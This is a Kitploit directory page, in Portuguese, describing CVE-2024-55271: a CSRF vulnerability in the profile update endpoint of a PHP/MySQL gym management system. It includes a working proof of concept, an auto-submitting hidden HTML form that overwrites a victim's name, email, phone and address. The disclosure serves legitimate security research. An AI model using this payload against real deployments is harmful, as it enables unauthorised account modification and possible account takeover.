Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-55271 — Sistema de gestão de academia usando PHP e MYSQL | Kitploit
Ferramentas/GitHubGitHub/shoaibalam112/cve-2024-55271
Análise de VulnerabilidadesExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubshoaibalam112/cve-2024-55271

CVE-2024-55271

Sistema de gestão de academia usando PHP e MYSQL

Ver Repositório
há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Sistema de Gerenciamento de Academia ( CVE-2024-55271 )

Um sistema de gerenciamento de academia construído usando PHP e MySQL.

Auditor

Shoaib Alam - Perfil no LinkedIn

Descrição

Vulnerabilidade CSRF na Seção de Atualização de Perfil

Uma vulnerabilidade de Cross-Site Request Forgery (CSRF) foi identificada no Sistema de Gerenciamento de Academia. Esse problema está presente na funcionalidade de atualização de perfil do Painel do Usuário.

Atualmente, a aplicação não implementa tokens Anti-CSRF, resultando em vulnerabilidade a ataques de Cross-Site Request Forgery (CSRF). Essa fraqueza de segurança afeta especificamente o endpoint /profile.php. Um atacante pode explorar essa falha para realizar modificações não autorizadas em informações sensíveis do usuário, como endereço, nome e número de telefone. Isso pode potencialmente comprometer a integridade das contas de usuário e levar a problemas de segurança adicionais.

Endpoint Vulnerável: /profile.php

Prova de Conceito (PoC)

Abaixo está uma prova de conceito demonstrando a vulnerabilidade CSRF. Esta PoC foi gerada usando o Burp Suite Professional.

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/gym/profile.php" method="POST">
      <input type="hidden" name="fname" value="hacked" />
      <input type="hidden" name="lname" value="victim" />
      <input type="hidden" name="email" value="attacker&#64;gmail&#46;com" />
      <input type="hidden" name="mobile" value="9999999999" />
      <input type="hidden" name="state" value="hacked" />
      <input type="hidden" name="city" value="hacked" />
      <input type="hidden" name="address" value="hacked" />
      <input type="hidden" name="submit" value="Update" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Baixar ferramenta